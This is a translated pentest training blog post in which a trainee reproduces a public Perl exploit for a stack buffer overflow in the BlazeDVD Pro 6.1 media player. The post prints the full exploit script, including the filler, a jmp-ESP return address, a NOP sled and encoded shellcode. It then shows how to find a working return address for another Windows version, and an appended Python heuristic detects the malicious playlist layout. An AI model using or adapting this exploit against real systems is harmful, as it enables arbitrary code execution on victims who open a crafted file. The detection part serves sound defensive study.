Trainee Pentest Log 19: Using the BlazeDVD Pro player 6.1 buffer overflow
Author: 新月
Another new piece from our 新月; gather round and have a look.
The usual AD: to learn pentesting, find 暗月; to learn code auditing, find 暗月. We are currently organising the fourth-quarter class, so feel free to leave suggestions in the comments.
The main text follows:
A friend sent me an exp for a media player:
http://www.exploit-db.com/exploits/26889/
```perl
#!/usr/bin/perl
# BlazeDVD Pro player 6.1 Local stack based buffer overflow
# Author: PuN1sh3r
# Email: [email protected]
# Date: Mon Jul 15 03:01:37 EDT 2013
# Vendor link: http://www.blazevideo.com/download.htmm
# Software Link: http://www.blazevideo.com/download.php?product=BlazeDVDPro
# App Version: 6.1
# Tested on: Windows 2003 server sp1(EN)
# special thanks to corelanc0d3r for his amazing tutorials

$file = "blazeExpl.plf";
$junk = "\x41" x 260;
$eip = "\x33\xFE\xE4\x77"; #jmp ESP on kernel32.dll

#msf win/exec calc.exe [*] x86/alpha_mixed
$shellcode = "\x89\xe7\xda\xd4\xd9\x77\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x49\x6c\x78\x68\x4d\x59\x67\x70\x77\x70" .
"\x43\x30\x65\x30\x6b\x39\x5a\x45\x76\x51\x59\x42\x52\x44" .
"\x6e\x6b\x71\x42\x46\x50\x6e\x6b\x56\x32\x36\x6c\x4e\x6b" .
"\x53\x62\x66\x74\x6c\x4b\x33\x42\x36\x48\x34\x4f\x6f\x47" .
"\x51\x5a\x75\x76\x75\x61\x39\x6f\x45\x61\x79\x50\x6c\x6c" .
"\x67\x4c\x70\x61\x53\x4c\x66\x62\x36\x4c\x57\x50\x5a\x61" .
"\x7a\x6f\x46\x6d\x63\x31\x5a\x67\x4a\x42\x4a\x50\x72\x72" .
"\x33\x67\x6c\x4b\x76\x32\x76\x70\x6c\x4b\x53\x72\x35\x6c" .
"\x46\x61\x4a\x70\x6e\x6b\x31\x50\x50\x78\x6b\x35\x39\x50" .
"\x54\x34\x62\x6a\x67\x71\x4e\x30\x30\x50\x6c\x4b\x52\x68" .
"\x35\x48\x6e\x6b\x70\x58\x51\x30\x43\x31\x6a\x73\x5a\x43" .
"\x55\x6c\x43\x79\x6c\x4b\x37\x44\x4c\x4b\x37\x71\x69\x46" .
"\x36\x51\x39\x6f\x46\x51\x4f\x30\x4e\x4c\x4f\x31\x5a\x6f" .
"\x64\x4d\x37\x71\x5a\x67\x46\x58\x79\x70\x43\x45\x4b\x44" .
"\x77\x73\x31\x6d\x4b\x48\x47\x4b\x51\x6d\x46\x44\x50\x75" .
"\x39\x72\x30\x58\x6c\x4b\x53\x68\x75\x74\x35\x51\x59\x43" .
"\x65\x36\x6c\x4b\x36\x6c\x52\x6b\x6e\x6b\x42\x78\x47\x6c" .
"\x63\x31\x48\x53\x6e\x6b\x63\x34\x4e\x6b\x56\x61\x7a\x70" .
"\x6c\x49\x73\x74\x34\x64\x56\x44\x63\x6b\x53\x6b\x43\x51" .
"\x61\x49\x43\x6a\x66\x31\x4b\x4f\x4b\x50\x31\x48\x71\x4f" .
"\x33\x6a\x6c\x4b\x32\x32\x48\x6b\x6e\x66\x31\x4d\x51\x7a" .
"\x76\x61\x6c\x4d\x6e\x65\x4f\x49\x37\x70\x67\x70\x63\x30" .
"\x72\x70\x70\x68\x44\x71\x4e\x6b\x32\x4f\x6b\x37\x39\x6f" .
"\x38\x55\x4f\x4b\x7a\x50\x6d\x65\x6c\x62\x70\x56\x55\x38" .
"\x6f\x56\x4d\x45\x6d\x6d\x6f\x6d\x39\x6f\x4b\x65\x55\x6c" .
"\x74\x46\x63\x4c\x55\x5a\x6d\x50\x49\x6b\x6b\x50\x64\x35" .
"\x67\x75\x6f\x4b\x72\x67\x57\x63\x71\x62\x62\x4f\x30\x6a" .
"\x57\x70\x36\x33\x69\x6f\x68\x55\x73\x53\x61\x71\x72\x4c" .
"\x30\x63\x44\x6e\x70\x65\x32\x58\x32\x45\x65\x50\x41\x41";

$junk .= $eip . "\x90" x 50 . $shellcode ;

###############################################################
open(FILE,">$file");
print FILE $junk;
close(FILE);
###############################################################
```
Let's test it.
First, use this exp to generate the malformed playlist file.
Run it:
Generated:
Then open the file with the player.
The player crashes instead of popping the calculator because the return address in the exp does not match our system: kernel32.dll differs between Windows versions, so the location of the instruction that jumps through ESP differs too.
All we need to do is change that address in the exp.
We use the tool findaddr.exe to search the local kernel32.dll for an instruction that transfers control to ESP.
Usage:
```text
findaddr kernel32.dll esp
[+]Scanning kernel32.dll for code useable with the esp register
[+]0x7c82385d call esp
[+]Finished Scanning kernel32.dll for code useable with the esp register
[+]Found 1 usable addresses
```
The address to use is 0x7c82385d (it goes into $eip in little-endian byte order, the same way the original "\x33\xFE\xE4\x77" was written).
Open the regenerated file with the player again.
The calculator pops successfully, O(∩_∩)O
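As an added defender-side example (mine, not the author's), here is a Python heuristic that flags a playlist file whose entry shows the filler, return address and NOP sled layout the exp builds. The 256-byte threshold and the one-path-per-line .plf format are assumptions, and both sample files are constructed.

```python
"""Heuristic triage of a .plf playlist for the overflow layout used above.
Added example, not from the post; assumes one plain-text path per line."""

MAX_ENTRY_LEN = 256   # assumed safe length (the exp needs 260 bytes to reach EIP)
MIN_FILLER_RUN = 64   # a run of one repeated byte this long looks like padding
MIN_NOP_SLED = 16     # consecutive 0x90 bytes treated as a NOP sled

def longest_run(data: bytes) -> tuple[int, int]:
    """Return (length, byte_value) of the longest run of one repeated byte."""
    best = (0, -1)
    cur = (0, -1)
    for b in data:
        cur = (cur[0] + 1, b) if b == cur[1] else (1, b)
        if cur[0] > best[0]:
            best = cur
    return best

def analyze_entry(entry: bytes) -> list[str]:
    """Apply each heuristic to one playlist entry and return the findings."""
    findings = []
    if len(entry) > MAX_ENTRY_LEN:
        findings.append(f"oversized entry: {len(entry)} bytes > {MAX_ENTRY_LEN}")
    run_len, run_byte = longest_run(entry)
    if run_len >= MIN_FILLER_RUN:
        findings.append(f"filler run: 0x{run_byte:02x} repeated {run_len} times")
    if b"\x90" * MIN_NOP_SLED in entry:
        findings.append("NOP sled (0x90 run) present")
    if any(not (0x20 <= b <= 0x7E or b == 0x09) for b in entry):
        findings.append("non-printable bytes in a text playlist entry")
    return findings

def analyze_plf(data: bytes) -> dict[int, list[str]]:
    """Return {line_number: findings} for every entry that trips a rule."""
    report = {}
    for n, line in enumerate(data.split(b"\n"), 1):
        hits = analyze_entry(line.rstrip(b"\r"))
        if hits:
            report[n] = hits
    return report

# Constructed samples (not files from the original post).
BENIGN_PLF = b"C:\\Movies\\intro.avi\r\nD:\\Clips\\trailer.mpg\r\n"
# Same layout as the exp: 260 bytes of filler, the 4-byte return address from
# the findaddr output (little-endian), a 50-byte NOP sled, then an ASCII
# stand-in where the real payload would sit.
RET_ADDR = b"\x5d\x38\x82\x7c"
EXPLOIT_LIKE_PLF = b"A" * 260 + RET_ADDR + b"\x90" * 50 + b"PAYLOAD_STANDIN\r\n"
```

Running `analyze_plf` over the benign sample returns an empty report, while the exploit-like sample trips all four rules on its first line.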
暗月: That's how awesome a buffer overflow is.
Disclaimer: the programs (methods) discussed in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site bears none. For any issues, contact us by e-mail (an enterprise or otherwise valid mailbox is recommended so the mail is not filtered; contact details are on the home page).